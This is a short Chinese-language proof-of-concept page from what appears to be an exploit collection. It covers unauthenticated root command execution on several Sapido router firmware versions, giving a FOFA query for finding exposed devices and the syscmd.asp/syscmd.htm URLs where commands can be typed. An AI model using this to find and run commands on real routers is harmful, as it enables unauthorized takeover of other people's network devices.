Awesome-POC/network-device/Sapido 多款路由器 远程命令执行漏洞.md
2022-02-20 16:14:31 +08:00

39 lines
678 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Sapido 多款路由器 远程命令执行漏洞
## 漏洞描述
Sapido多款路由器在未授权的情况下导致任意访问者可以以Root权限执行命令
## 漏洞影响
```
BR270n-v2.1.03
BRC76n-v2.1.03
GR297-v2.1.3
RB1732-v2.0.43
```
## FOFA
```
app="Sapido-路由器"
```
## 漏洞复现
固件中存在一个asp文件为 **syscmd.asp** 存在命令执行
![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162237726.png)
访问目标:
```plain
http://xxx.xxx.xxx.xxx/syscmd.asp
http://xxx.xxx.xxx.xxx/syscmd.htm
```
![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202162237444.png)
直接输入就可以命令执行了